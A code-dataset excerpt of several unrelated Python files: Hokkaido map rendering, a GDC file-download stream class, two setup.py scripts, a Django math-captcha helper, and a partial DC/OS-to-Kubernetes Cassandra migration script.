    3: dict(name="檜山"   , code="03", suffix="振興局"  , total=  34589),
    4: dict(name="後志"   , code="04", suffix="総合振興局", total= 202399),
    5: dict(name="空知"   , code="05", suffix="総合振興局", total= 284613),
    6: dict(name="上川"   , code="06", suffix="総合振興局", total= 486430),
    7: dict(name="留萌"   , code="07", suffix="振興局"  , total=  44066),
    8: dict(name="宗谷"   , code="08", suffix="総合振興局", total=  62000),
    9: dict(name="オホーツク", code="09", suffix="総合振興局", total= 274757),
    10:dict(name="胆振"   , code="10", suffix="総合振興局", total= 384448),
    11:dict(name="日高"   , code="11", suffix="振興局"  , total=  64725),
    12:dict(name="十勝"   , code="12", suffix="総合振興局", total= 335432),
    13:dict(name="釧路"   , code="13", suffix="総合振興局", total= 225158),
    14:dict(name="根室"   , code="14", suffix="振興局"  , total=  73102)
}
# Municipalities belonging to each subprefecture.
city_towns = {
    0: "非公表 中国".split(),
    1: "札幌市 江別市 千歳市 恵庭市 北広島市 石狩市 当別町 新篠津村".split(),
    2: "函館市 松前町 福島町 知内町 木古内町 北斗市 七飯町 鹿部町 森町 八雲町 長万部町".split(),
    3: "江差町 上ノ国町 厚沢部町 乙部町 せたな町 今金町 奥尻町".split(),
    4: "小樽市 島牧村 寿都町 黒松内町 蘭越町 ニセコ町 真狩村 留寿都村 喜茂別町 京極町 倶知安町 共和町 岩内町 泊村 神恵内村 積丹町 古平町 仁木町 余市町 赤井川村".split(),
    5: "夕張市 岩見沢市 美唄市 芦別市 赤平市 三笠市 滝川市 砂川市 歌志内市 深川市 南幌町 奈井江町 上砂川町 由仁町 長沼町 栗山町 月形町 浦臼町 新十津川町 妹背牛町 秩父別町 雨竜町 北竜町 沼田町 幌加内町".split(),
    6: "旭川市 士別市 名寄市 富良野市 鷹栖町 東神楽町 当麻町 比布町 愛別町 上川町 東川町 美瑛町 和寒町 剣淵町 下川町 上富良野町 中富良野町 南富良野町 占冠村 美深町 音威子府村 中川町".split(),
    7: "留萌市 増毛町 小平町 苫前町 羽幌町 初山別村 遠別町 天塩町 幌延町".split(),
    8: "稚内市 猿払村 浜頓別町 中頓別町 枝幸町 豊富町 礼文町 利尻町 利尻富士町".split(),
    9: "北見市 網走市 紋別市 大空町 美幌町 津別町 斜里町 清里町 小清水町 訓子府町 置戸町 佐呂間町 遠軽町 湧別町 滝上町 興部町 西興部村 雄武町".split(),
    10:"室蘭市 苫小牧市 登別市 伊達市 豊浦町 洞爺湖町 壮瞥町 白老町 安平町 厚真町 むかわ町".split(),
    11:"日高町 平取町 新冠町 新ひだか町 浦河町 様似町 えりも町".split(),
    12:"帯広市 新得町 清水町 幕別町 池田町 豊頃町 本別町 音更町 士幌町 上士幌町 鹿追町 芽室町 中札内村 更別村 大樹町 広尾町 足寄町 陸別町 浦幌町".split(),
    13:"釧路市 釧路町 厚岸町 浜中町 標茶町 弟子屈町 鶴居村 白糠町".split(),
    14:"根室市 別海町 中標津町 標津町 羅臼町 色丹村 泊村 留夜別村 留別村 紗那村 蘂取村".split(), # Note: 泊村 duplicates an entry under Shiribeshi (key 4)
}
def get_sub_code(name):
    """Return the subprefecture number for a bureau or municipality name.

    Matches either a bureau name prefix (e.g. "石狩") or an exact
    municipality name; returns 0 ("undisclosed") when nothing matches.
    """
    for code, info in sub_prefs.items():
        if info['name'] != "" and name.startswith(info['name']):
            return code
    for code, towns in city_towns.items():
        if len(towns) > 0 and name in towns:
            return code
    return 0
def get_svg_txt(dic=None, rate=1):
    """Return the Hokkaido SVG source, recolouring subprefectures per *dic*.

    Args:
        dic: optional mapping of subprefecture number (int, or a zero-padded
            string such as "03") to a colour string; the ``#cNN`` placeholder
            tokens in the SVG are replaced by the given colours.
        rate: unused; kept for backward compatibility.
    """
    svg_path = str(Path(__file__).parent / "Subprefectures_of_Hokkaido.svg")
    # ``with`` closes the handle; the original leaked it.
    with codecs.open(svg_path, encoding="utf-8") as f:
        p = f.read()
    if hasattr(dic, "items"):
        for k, v in dic.items():
            # Bug fix: ``lstrp`` was a typo for ``lstrip`` (AttributeError on
            # string keys), and the computed index was never used in the
            # placeholder format below, which also crashed on string keys.
            i = k if isinstance(k, int) else int(k.lstrip("0"))
            if 0 <= i <= 14:
                p = p.replace("#c%02d" % i, v)
    return p
def get_hokkaido(dic=None, ret=1):
    """Render the recoloured Hokkaido SVG and return it as an RGB ndarray.

    Args:
        dic: colour mapping forwarded to :func:`get_svg_txt`.
        ret: forwarded as get_svg_txt's (unused) ``rate`` argument.
    """
    txt = get_svg_txt(dic, ret)
    filename = str(Path(__file__).parent / "svglib.tmp")
    # ``with`` guarantees the temp SVG is flushed and closed before
    # svglib reads it back for rendering.
    with codecs.open(filename, "w", encoding="utf-8") as f:
        f.write(txt)
    drawing = svg2rlg(filename)
    pngname = filename.replace(".tmp", ".jpg")
    renderPM.drawToFile(drawing, pngname, 'JPEG')
    # OpenCV loads BGR; convert to RGB for matplotlib/plotly consumers.
    x = imread(pngname)
    img = cvtColor(x, COLOR_BGR2RGB)
    return img
##def make_hokkaido_heatmap(filename, title, npa1d):
## """ 北海道のヒートマップを作成する """
## plt.close()
## plt.style.use("dark_background")
## #plt.subplots_adjust(left=0.07, right=0.99, bottom=0.07, top=0.95)
## plt.title(title, fontname=FONT_NAME)
## plt.rcParams['figure.figsize'] = 8, 8
## cmap = plt.get_cmap("rainbow")
## norm = plt.Normalize(vmin=np.min(npa1d), vmax=np.max(npa1d))
## fcol = lambda x: '#' + bytes(cmap(norm(x), bytes=True)[:3]).hex()
## plt.colorbar(cm.ScalarMappable(norm, cmap))
## map_cols = {}
## for k, v in sub_prefs.items():
## map_cols[k] = fcol(npa1d[k])
## #print(map_cols)
## pict = get_hokkaido(map_cols)
## plt.imshow(pict)
## plt.savefig(filename)
def make_hokkaido_plotly(filename, title, npa1d):
    """ 北海道のヒートマップを作成する """
    # NOTE(review): this function references ``plt`` (matplotlib) and
    # ``Image`` (PIL), but the matplotlib import at the top of this file is
    # commented out and PIL is never imported -- as written this raises
    # NameError. Restore those imports before calling it.
    fig = go.Figure()
    w=600
    h=528
    cmap = plt.get_cmap("plasma")
    norm = plt.Normalize(vmin=np.min(npa1d), vmax=np.max(npa1d))
    fcol = lambda x: '#' + bytes(cmap(norm(x), bytes=True)[:3]).hex()
    map_cols = {}
    for k, v in sub_prefs.items():
        map_cols[k] = fcol(npa1d[k])
    pict = get_hokkaido(map_cols)
    fig.add_trace(go.Scatter(x=[0, w], y=[0, h], mode='markers', marker_opacity=0))
    # Invisible heatmap trace only provides the colour bar; index 0 is the
    # "undisclosed" bucket and is excluded from the scale.
    fig.add_trace(go.Heatmap(x=[0, 0], y=[0, 0], opacity=0,
                             z=[np.min(npa1d[1:]), np.max(npa1d[1:])],
                             zmin=np.min(npa1d[1:]), zmax=np.max(npa1d[1:]),
                             type='heatmap', colorscale='plasma', showscale=True))
    map_cols = {}
    axis_template = lambda x: dict(
        range=[0, x], autorange=False, showgrid=False, zeroline=False,
        linecolor='black', showticklabels=False, ticks='')
    fig.update_layout(title=title, xaxis=axis_template(w), yaxis=axis_template(h),
        showlegend=False, width=w, height=h, autosize=False,
        margin={"l": 0, "r": 0, "t":40, "b": 0}
    )
    fig.add_layout_image(dict(
        x=0, sizex=w, y=h, sizey=h, xref="x", yref="y", opacity=1,
        layer="below", sizing="stretch", source=Image.fromarray(pict)))
    show_and_save_plotly(fig, filename, js=False, show=True, image=True, html=False)
def make_hokkaido_choropleth(filename, title, npa1d, show=True):
    """Draw a per-subprefecture choropleth map of Hokkaido and save it."""
    with codecs.open("hokkaido-min.geojson", "r", encoding='utf-8') as f:
        geojson = json.load(f)
    df = pd.read_csv('hokkaido.txt', header=0, index_col=0,
                     dtype={'code': str, 'total': int, 'subcode': str, 'color': float})
    # Copy the per-subprefecture values into the frame row by row.
    for row, value in enumerate(npa1d):
        df.loc[row, 'color'] = value
    fig = px.choropleth(df, geojson=geojson, color="color", hover_name='name',
                        locations="subcode", featureidkey="properties.code",
                        hover_data=['total'],
                        labels={'color':'値', 'subcode':'自治体コード', 'total':'人口'},
                        projection="mercator", title=title)
    # Clip the view to the Hokkaido bounding box.
    fig.update_geos(visible=False,
                    lonaxis=dict(range=[139.772386, 145.792893]),
                    lataxis=dict(range=[41.383390, 45.531737]))
    fig.update_layout(margin={"r": 0, "t": 40, "l": 0, "b": 0})
    show_and_save_plotly(fig, filename, js=False, show=show, image=True, html=True)
def test_picture():
    """Render a sample map with a distinct colour per subprefecture."""
    palette = {
        1: "#0000ff", 2: "#ff0000", 3: "#00ff00", 4: "#ff00ff",
        5: "#00ffff", 6: "#ffff00", 7: "#ffffff", 8: "#cccccc",
        9: "#000080", 10: "#008000", 11: "#800000", 12: "#000000",
        13: "#800080", 14: "#808000",
    }
    f = get_hokkaido(palette)
    import matplotlib.pyplot as plt
    plt.imshow(f)
    plt.savefig("hoge.jpg")
if __name__ == "__main__":
    # Smoke test: dump the lookup tables, exercise get_sub_code on sample
    # names, then render the sample coloured map.
    for k, v in sub_prefs.items():
        print("no:{} name:{} code:{} total:{} ".format(k, v['name'], v['code'], v['total']))
    for k, v in city_towns.items():
        print("k:{} v:{}".format(k, v))
    names = ["函館市", "旭川市", "白糠町", "小樽市", "空知", "日高", "日高振興局管内", "札幌市", "非公表", "中国"]
    for n in names:
        print("{} = {}".format(n, get_sub_code(n)))
    test_picture()
| StarcoderdataPython |
3300847 | <gh_stars>100-1000
# ***************************************************************************************
# Title: LabAdvComp/parcel
# Author: <NAME>
# Date: May 26, 2016
# Code version: 0.1.13
# Availability: https://github.com/LabAdvComp/parcel
# ***************************************************************************************
from gdc_client.parcel import utils
from gdc_client.parcel import const
from gdc_client.parcel.defaults import max_timeout, deprecation_header
import logging
from intervaltree import Interval
import os
import requests
import time
from urllib.parse import urlparse
class DownloadStream(object):
    """Streams one remote file to disk, optionally in ranged segments.

    The stream lazily fetches file metadata (name/size/md5) from the data
    server, prepares the target/temp/state paths, and downloads byte ranges,
    reporting completed intervals through a multiprocessing queue.
    """

    http_chunk_size = const.HTTP_CHUNK_SIZE
    check_segment_md5sums = True

    def __init__(self, url, directory, token=None):
        """Create a stream for *url*, saving under *directory*.

        :param str url: data endpoint for the file (may contain several ids)
        :param str directory: base output directory
        :param token: optional auth token sent as ``X-Auth-Token``
        """
        self.initialized = False
        self.is_regular_file = True
        self.log = logging.getLogger(str(url))
        self.name = None
        self.directory = self._get_directory_name(directory, url)
        self.size = None
        self.md5sum = None
        self.token = token
        self.url = url
        self.check_file_md5sum = True

    def init(self):
        """Fetch remote metadata and mark the stream as initialized."""
        self.get_information()
        self.print_download_information()
        self.initialized = True
        return self

    def _get_directory_name(self, directory, url):
        """Derive the per-download folder name from the URL path.

        A single-id path uses the id itself; a comma-separated multi-id
        request gets a timestamped folder instead.
        """
        # get filename/id
        path = urlparse(url).path
        if "," not in path:
            folder = os.path.basename(path)
        else:
            # path name is a multi-id dl
            folder = time.strftime("parcel-%Y%m%d-%H%M%S")
        return os.path.join(directory, folder)

    def _parse_filename(self, filename):
        """Given an attachment filename, which sometimes is an S3 Key, strip
        quotation marks and return a "basename" as a filename

        :param str: filename or S3 key
        :returns: proper filename
        """
        name = filename.strip('"').strip("'")
        return os.path.basename(name)

    def setup_file(self):
        """Create output directories and pre-allocate the temp file."""
        self.setup_directories()
        try:
            utils.set_file_length(self.temp_path, self.size)
        except Exception:
            # Pre-allocation fails on special files (pipes, devices, ...);
            # fall back to treating the target as non-regular.  (Narrowed
            # from a bare ``except:`` so Ctrl-C is not swallowed here.)
            self.log.warning(
                utils.STRIP(
                    """Unable to set file length. File appears to
                    be a {0} file, attempting to proceed.
                    """.format(
                        utils.get_file_type(self.path)
                    )
                )
            )
            self.is_regular_file = False

    def setup_directories(self):
        """Create the download directory and its state subdirectory."""
        if not os.path.exists(self.directory):
            os.makedirs(self.directory)
        if not os.path.exists(self.state_directory):
            os.makedirs(self.state_directory)

    @property
    def path(self):
        """Function to standardize the output path for a download.

        :returns: A string specifying the full download path
        """
        return os.path.join(self.directory, self.name)

    @property
    def temp_path(self):
        """Function to standardize the temp path for a download.

        :returns: A string specifying the full temp path
        """
        return os.path.join(self.directory, "{0}.partial".format(self.name))

    @property
    def state_path(self):
        """Function to standardize the state path for a download.

        :returns: A string specifying the download state path
        """
        return os.path.join(self.state_directory, "{0}.parcel".format(self.name))

    @property
    def state_directory(self):
        """Function to standardize the state directory for a download.

        :returns: A string specifying the download state directory
        """
        return os.path.join(self.directory, "logs")

    def header(self, start=None, end=None):
        """Return a standard header for any parcel HTTP request. If ``start``
        and ``end`` are specified, then the header will contain a Range
        request.

        :param int start: optional. The beginning of the range interval
        :param int end: optional.
            The end of the range interval. This value is inclusive.
            If give range A-B, then both bytes A and B will be
            included.
        :returns: A dictionary header containing the token
        """
        header = {
            "X-Auth-Token": self.token,
        }
        if start is not None and end is not None:
            header["Range"] = "bytes={0}-{1}".format(start, end)
            # provide host because it's mandatory, range request
            # may not work otherwise
            scheme, host, path, params, q, frag = urlparse(self.url)
            header["host"] = host
        return header

    def request(self, headers=None, verify=True, close=False, max_retries=16):
        """Make request for file and return the response.

        :param str file_id: The id of the entity being requested.
        :param dict headers: Request headers. see :func:`construct_header()`.
        :param bool verify: Verify SSL hostname
        :param bool close:
            Automatically close the connection. Set to true if you just
            the response header.
        :returns: A `requests` response.
        """
        self.log.debug("Request to {0}".format(self.url))

        # Set urllib3 retries and mount for session
        a = requests.adapters.HTTPAdapter(max_retries=max_retries)
        s = requests.Session()
        s.mount(urlparse(self.url).scheme, a)

        # Bug fix: this previously called ``self.headers()``, a method that
        # does not exist on this class -- the header builder is ``header()``.
        # NOTE(review): confirm no subclass relies on defining ``headers()``.
        headers = self.header() if headers is None else headers
        try:
            r = s.get(
                self.url,
                headers=headers,
                verify=verify,
                stream=True,
                timeout=max_timeout,
            )
        except Exception as e:
            raise RuntimeError(
                (
                    "Unable to connect to API: ({0}). Is this url correct: '{1}'? "
                    "Is there a connection to the API? Is the server running?"
                ).format(str(e), self.url)
            )
        try:
            r.raise_for_status()
        except Exception as e:
            raise RuntimeError("{0}: {1}".format(str(e), r.text))

        if close:
            r.close()
        return r

    def get_information(self):
        """Make a request to the data server for information on the file.

        :param str file_id: The id of the entity being requested.
        :returns: Tuple containing the name and size of the entity
        """
        headers = self.header()
        r = self.request(headers, close=True)
        self.log.debug("Request responded")
        content_length = r.headers.get("Content-Length")
        if not content_length:
            self.log.debug("Missing content length.")
            # it also won't come with an md5sum
            self.check_file_md5sum = False
        else:
            self.size = int(content_length)
            self.log.debug("{0} bytes".format(self.size))
        attachment = r.headers.get("content-disposition", None)
        self.log.debug("Attachment: : {}".format(attachment))
        # Some of the filenames are set to be equal to an S3 key, which can
        # contain '/' characters and it breaks saving the file
        self.name = (
            self._parse_filename(attachment.split("filename=")[-1])
            if attachment
            else "untitled"
        )
        self.md5sum = None
        if self.check_file_md5sum:
            self.md5sum = r.headers.get("content-md5", "")
        return self.name, self.size

    def write_segment(self, segment, q_complete, retries=5):
        """Read data from the data server and write it to a file.

        :param str file_id: The id of the file
        :params str path: A string specifying the full download path
        :params tuple segment:
            A tuple containing the interval to download (start, end)
        :params q_out: A multiprocessing Queue used for async reporting
        :returns: The total number of bytes written
        """
        written = 0
        # Create header that specifies range and make initial stream
        # request. Note the 1 subtracted from the end of the interval
        # is because the HTTP range request is inclusive of the top of
        # the interval.
        start, end = segment.begin, segment.end - 1
        assert end >= start, "Invalid segment range."
        try:
            # Initialize segment request
            r = self.request(self.header(start, end))
            # Iterate over the data stream
            self.log.debug("Initializing segment: {0}-{1}".format(start, end))
            for chunk in r.iter_content(chunk_size=self.http_chunk_size):
                if not chunk:
                    continue  # Empty are keep-alives.
                offset = start + written
                # Write the chunk to disk, create an interval that
                # represents the chunk, get md5 info if necessary, and
                # report completion back to the producer
                utils.write_offset(self.temp_path, chunk, offset)
                if self.check_segment_md5sums:
                    iv_data = {"md5sum": utils.md5sum(chunk)}
                else:
                    iv_data = None
                complete_segment = Interval(offset, offset + len(chunk), iv_data)
                q_complete.put(complete_segment)
                written += len(chunk)
        except KeyboardInterrupt:
            return self.log.error("Process stopped by user.")
        # Retry on exception if we haven't exceeded max retries
        except Exception as e:
            # Narrow the remaining interval so already-written bytes are not
            # downloaded again on retry.
            segment = Interval(segment.begin + written, segment.end, None)
            self.log.debug("Unable to download part of file: {0}\n.".format(str(e)))
            if retries > 0:
                self.log.debug("Retrying download of this segment")
                return self.write_segment(segment, q_complete, retries - 1)
            else:
                self.log.error("Max retries exceeded.")
                return 0

        # Check that the data is not truncated or elongated
        if written != segment.end - segment.begin:
            # Retry only the unwritten tail of the segment.
            segment = Interval(segment.begin + written, segment.end, None)
            self.log.debug(
                "Segment corruption: {0}".format(
                    "(non-fatal) retrying" if retries else "max retries exceeded"
                )
            )
            if retries:
                return self.write_segment(segment, q_complete, retries - 1)
            else:
                raise RuntimeError("Segment corruption. Max retries exceeded.")

        r.close()
        return written

    def print_download_information(self):
        """Log the file name, size and destination path for this download."""
        self.log.debug("Starting download : {0}".format(self.url))
        self.log.debug("File name         : {0}".format(self.name))
        # some tarfiles will not come with Content-Length in the header
        if self.size:
            self.log.debug(
                "Download size     : {0} B ({1:.2f} GB)".format(
                    self.size, (self.size / float(const.GB))
                )
            )
        self.log.debug("Downloading file to : {0}".format(self.path))
| StarcoderdataPython |
52065 | # pylint: disable=no-name-in-module,import-error
"""
Copyright 2017-2018 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
from distutils.core import setup
from setuptools import find_packages
from setuptools.command.install import install
# Package metadata used by the setup() call below.
DESCRIPTION = "Icetea - test framework"
OWNER_NAMES = "<NAME>"
OWNER_EMAILS = "<EMAIL>"
VERSION = "2.0.1"
def read(fname):
    """
    Utility function to cat in a file
    :param fname: filename (relative to this setup.py's directory)
    :return: file content as a String
    """
    # Use a context manager so the file handle is closed deterministically
    # instead of leaking until garbage collection.
    with open(os.path.join(os.path.dirname(__file__), fname)) as handle:
        return handle.read()
# Runtime dependencies, pinned to version ranges known to work with Icetea.
INSTALL_REQUIRES = [
    "prettytable<1.0",
    "requests",
    "yattag>=1.0,<2.0",
    "pyserial>2.5",
    "jsonmerge>=1.4.0,<2.0",
    "jsonschema<3.0.0",
    "mbed-ls>=1.5.1,<2.0",
    "semver>=2.0,<3.0",
    "mbed-flasher>=0.10.1,<0.11",
    "six>=1.0,<2.0",
    "pydash>=4.0,<5.0",
    "transitions<1.0"
]
# Extra dependencies needed only for the test suite, docs and linting.
TEST_REQUIRES = [
    "coverage>=4.0,<5.0",
    "mock>=2.0,<3.0",
    "sphinx>=1.0,<2.0",
    "lxml",
    "pylint>=1.0,<2.0",
    "astroid>=1.0,<2.0"
]
class VerifyVersionCommand(install):
    """
    Custom setuptools install command that, when running on CircleCI,
    verifies that the pushed git tag matches the package VERSION before
    a release is published. Outside CI it is a no-op.
    """
    description = "verify that the git tag matches our version"
    def run(self):
        is_ci = os.getenv("CIRCLECI")
        if is_ci:
            tag = os.getenv("CIRCLE_TAG")
            version = "v" + VERSION
            if tag != version:
                # Bug fix: the two fragments previously concatenated without a
                # separating space, producing "...does not match theversion...".
                info = "Git tag: {0} does not match the "\
                       "version of this app: {1}".format(tag, version)
                sys.exit(info)
        # else: you are your own - please do not publish any releases without tag!
# Package definition; metadata constants and dependency lists are defined above.
setup(name="icetea",
      version=VERSION,
      description=DESCRIPTION,
      long_description=read("README.md"),
      long_description_content_type='text/markdown',
      author=OWNER_NAMES,
      author_email=OWNER_EMAILS,
      maintainer=OWNER_NAMES,
      maintainer_email=OWNER_EMAILS,
      url="https://github.com/ARMmbed/icetea.git",
      packages=find_packages(include=["icetea_lib.*", "icetea_lib"]),
      data_files=[("icetea_lib", ["icetea_lib/tc_schema.json", "icetea_lib/logging_schema.json"])],
      include_package_data=True,
      keywords="armbed mbed-os mbed-cli ci framework testing automation",
      license="(R) ARM",
      tests_require=TEST_REQUIRES,
      test_suite="test",
      entry_points={
          "console_scripts": [
              "icetea=icetea_lib:icetea_main"
          ]
      },
      install_requires=INSTALL_REQUIRES,
      classifiers=[
          "Programming Language :: Python :: 2.7",
          "Programming Language :: Python :: 3.5",
          "Programming Language :: Python :: 3.6",
          "Programming Language :: Python :: 3.7",
          "License :: OSI Approved :: Apache Software License",
          "Operating System :: OS Independent",
      ],
      # "verify" command (used in CI) checks the git tag against VERSION.
      cmdclass={
          "verify": VerifyVersionCommand,
      }
      )
| StarcoderdataPython |
152715 | <filename>simplemathcaptcha/utils.py
from __future__ import absolute_import
from __future__ import unicode_literals
from random import randint, choice
from hashlib import sha1
from django.conf import settings
from django.utils import six
# Operator symbols presented to the user in the captcha question.
MULTIPLY = '*'
ADD = '+'
SUBTRACT = '-'
# Map each operator symbol to its arithmetic implementation.
CALCULATIONS = {
    MULTIPLY: lambda a, b: a * b,
    ADD: lambda a, b: a + b,
    SUBTRACT: lambda a, b: a - b,
}
# Tuple of available operator symbols (dict iteration yields keys).
OPERATORS = tuple(CALCULATIONS)
def hash_answer(value):
    """Return the SHA-1 hex digest of SECRET_KEY + the stringified answer.

    Used to verify the captcha answer without storing it in clear text.
    """
    payload = (settings.SECRET_KEY + six.text_type(value)).encode('utf-8')
    return sha1(payload).hexdigest()
def get_operator():
    """Pick a random arithmetic operator symbol for the captcha question."""
    return choice(OPERATORS)
def get_numbers(start_int, end_int, operator):
    """Draw two random operands in [start_int, end_int].

    For subtraction the larger operand is placed first so the
    captcha answer is never negative.
    """
    first = randint(start_int, end_int)
    second = randint(start_int, end_int)
    if operator == SUBTRACT and second > first:
        first, second = second, first
    return first, second
def calculate(x, y, operator):
    """Apply *operator* (one of OPERATORS) to x and y and return the result."""
    return CALCULATIONS[operator](x, y)
| StarcoderdataPython |
1610497 | import os
from setuptools import setup
# Package definition for the "words" starter project.
setup(
    name="words",
    version="0.0.1",
    # Bug fix: description was accidentally a 1-tuple ("...",) due to a
    # trailing comma inside parentheses; setuptools expects a plain string.
    description="Code Styles Python starter",
    license="MIT",
    keywords="Python",
    packages=['words'],
    setup_requires=[
        'pytest-runner',
    ],
    tests_require=[
        'pytest',
    ]
)
| StarcoderdataPython |
185742 | <reponame>Ganasagar/migration-tools-repo<gh_stars>0
import base64
import math
import os
import json
import logging as log
RACK_TOPOLOGY_TEMPLATE = """
- rack: {}
rackLabelValue: {}"""
NODE_TOPOLOGY_TEMPLATE = """
- datacenter: {}
datacenterLabels:
failure-domain.beta.kubernetes.io/region: {}
nodes: {}
rackLabelKey: failure-domain.beta.kubernetes.io/zone
racks: {}"""
PASSWD_SECRET_TEMPLATE = """apiVersion: v1
kind: Secret
metadata:
name: {}
type: Opaque
data:
username: {}
password: {}"""
PASSWD_SECRET_YAML_FILE = "cassandra-auth.yaml"
# KUBERNETES CLI
KUBECTL = os.getenv("KUBECTL", "kubectl")
SEP = "--------------------------------------------------"
WARNING = """
WARNING: ALL THE PARAMETERS ARE GENERATED AS PER THE DCOS VERSION OF THE SERVICE, IT MIGHT NOT BE THE BEST FOR K8s.
SO BEFORE INSTALLING THE SERVICE PLEASE OPEN A TARGET FILE ({}) AND MODIFY VALUES AS PER THE AVAILABILITY ON THE K8s CLUSTER.
SPECIALLY VALUES OF THESE FIELDS SHOULD BE ADJUSTED AS PER THE CLUSTER:
NODE_COUNT
NODE_CPU_MC
NODE_CPU_LIMIT_MC
NODE_MEM_MIB
NODE_MEM_LIMIT_MIB
NODE_DISK_SIZE_GIB
NODE_TOPOLOGY
EXTERNAL_SEED_NODES
OTC_COALESCING_STRATEGY - value should be one of these [disabled fixed movingaverage timehorizon]
ENDPOINT_SNITCH - if GossipingPropertyFileSnitch not working, use SimpleSnitch
TLS_SECRET_NAME - Only relavent if TLS is enabled
AUTHENTICATION_SECRET_NAME - Only relavent if AUTHENTICATOR is set to PasswordAuthenticator
"""
def print_password_secret_instruction(target_dir: str, secret_name: str, namespace: str, username: str, password: str):
    """Write a Kubernetes Secret manifest for PasswordAuthenticator credentials
    and print the kubectl command needed to apply it.

    Username and password are base64-encoded as required by the Secret format.
    """
    secret_yaml_file = os.path.join(target_dir, PASSWD_SECRET_YAML_FILE)
    with open(secret_yaml_file, "w+") as f:
        f.write(
            PASSWD_SECRET_TEMPLATE.format(secret_name,
                                          base64.b64encode(username.encode("ascii")).decode("ascii"),
                                          base64.b64encode(password.encode("ascii")).decode("ascii")))
    SECRET_CMD = '''
    {kubectl} apply \\
        --namespace {namespace} \\
        --filename {secret_yaml_file}
    '''
    print(SEP)
    print("Run following command to create secret for PasswordAuthenticator: {}".format(
        SECRET_CMD.format(kubectl=KUBECTL, namespace=namespace, secret_yaml_file=secret_yaml_file)))
    print(SEP)
def print_tls_instructions(namespace: str):
    """Print the kubectl command for creating the TLS secret (cert + key)
    that the migrated Cassandra instance expects when TLS is enabled."""
    TLS_CMD = '''
    {kubectl} create secret tls {secret_name} \\
        --namespace {namespace} \\
        --cert {cert_file} \\
        --key {key_file}
    '''
    print(SEP)
    print(
        "Since TLS is enabled, make sure to create a TLS secret that contains the certificate (cassandra.crt) and the private key (cassandra.key)."
    )
    print("The name of the secret should be `cassandra-tls` and namespace should be `{}`".format(namespace))
    print("Following command could be used here: {}".format(
        TLS_CMD.format(kubectl=KUBECTL,
                       secret_name="cassandra-tls",
                       namespace=namespace,
                       cert_file="cassandra.crt",
                       key_file="cassandra.key")))
    print(SEP)
def print_instructions(namespace: str, instance: str, target_file: str, version: str):
    """Print the KUDO commands to install the migrated Cassandra operator and
    to check the installation plan status, plus the parameter-review warning.

    :param namespace: target Kubernetes namespace
    :param instance: KUDO instance name
    :param target_file: generated parameter file to review before install
    :param version: Cassandra operator version to install
    """
    KUDO_CMD = '''
    {kubectl} kudo install \\
        --namespace {namespace} \\
        --instance {instance} \\
        --parameter-file {target_file} \\
        --operator-version {version} \\
        cassandra
    '''
    KUDO_STATUS_CMD = """
    {kubectl} kudo plan status \\
        --namespace {namespace} \\
        --instance {instance}
    """
    print(SEP)
    # WARNING reminds the operator to review generated parameters first.
    print(WARNING.format(target_file))
    print(SEP)
    print("Run the following command to install Cassandra on K8s: {}".format(
        KUDO_CMD.format(kubectl=KUBECTL,
                        namespace=namespace,
                        instance=instance,
                        target_file=target_file,
                        version=version)))
    print(SEP)
    print("Run the following command to check the status: {}".format(
        KUDO_STATUS_CMD.format(kubectl=KUBECTL, namespace=namespace, instance=instance)))
    print(SEP)
    # Bug fix: user-facing typo "COMPELTE" -> "COMPLETE".
    print("Make sure plan shows COMPLETE, before proceeding further.")
    print(SEP)
def translate_mesos_to_k8s(namespace: str, target_dir: str, src_file: str, target_file: str) -> bool:
    """Translate a DC/OS (Mesos) Cassandra env-config JSON into a KUDO
    parameter file using the bundled params.yml.tmpl template.

    Side effects: may write a password secret manifest and print kubectl
    instructions for TLS / PasswordAuthenticator setup.
    :return: True on success, False if an input/template file is missing.
    """
    log.info(f'Using "{src_file}" file to migrate to kubernetes configuration at "{target_file}"')
    tmpl_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../resources/params.yml.tmpl")
    if not os.path.exists(src_file):
        log.error("Mesos configuration file {} does not exists!".format(src_file))
        return False
    with open(src_file, "r") as f:
        src_envs = json.load(f)
    if not os.path.exists(tmpl_file):
        log.fatal("Missing Template File {}".format(tmpl_file))
        return False
    with open(tmpl_file, "r") as f:
        tmpl_lines = f.readlines()
    # Convert Disk Size from MB to GiB (rounded up)
    src_envs["CASSANDRA_DISK_GB"] = str(math.ceil(float(src_envs["CASSANDRA_DISK_MB"]) / 1024))
    # Convert CPUs to millicores and round up
    src_envs["CASSANDRA_CPUS"] = str(math.ceil(float(src_envs["CASSANDRA_CPUS"]) * 1000))
    # K8s operator expects the coalescing strategy in lowercase
    src_envs["CASSANDRA_OTC_COALESCING_STRATEGY"] = src_envs["CASSANDRA_OTC_COALESCING_STRATEGY"].lower()
    # Check if TLS is enabled; if so, instruct the user and reference the TLS secret
    if "SECURITY_TRANSPORT_ENCRYPTION_ENABLED" in src_envs and src_envs[
            "SECURITY_TRANSPORT_ENCRYPTION_ENABLED"] == "true":
        print_tls_instructions(namespace)
        src_envs["CASSANDRA_TLS_SECRET_NAME"] = "cassandra-tls"
    # Check if Authenticator is PasswordAuthenticator; if so, emit a secret manifest
    if src_envs["CASSANDRA_AUTHENTICATOR"] == "PasswordAuthenticator":
        print_password_secret_instruction(target_dir, "cassandra-auth", namespace, src_envs["NEW_SUPERUSER"],
                                          src_envs["NEW_USER_PASSWORD"])
        src_envs["CASSANDRA_AUTHENTICATION_SECRET_NAME"] = "cassandra-auth"
    # Convert Cassandra Rack-awareness to K8s Cassandra Node Topology:
    # one rack entry per node, each mapped to that node's zone label.
    if src_envs["PLACEMENT_REFERENCED_ZONE"] == "true":
        racks = ""
        for node in range(int(src_envs["NODES"])):
            racks += RACK_TOPOLOGY_TEMPLATE.format("rack" + str(node + 1), src_envs['ZONE'][node])
        src_envs["NODE_TOPOLOGY"] = NODE_TOPOLOGY_TEMPLATE.format(src_envs["CASSANDRA_LOCATION_DATA_CENTER"],
                                                                  src_envs["REGION"], src_envs["NODES"], racks)
    # Fill the template: each template line is "PARAM: SOURCE_ENV_NAME";
    # only write parameters whose source env var exists and is non-empty.
    with open(target_file, "w") as f:
        for tmpl in tmpl_lines:
            tmpl_key, tmpl_value = tmpl.split(':')
            tmpl_value = tmpl_value.strip()
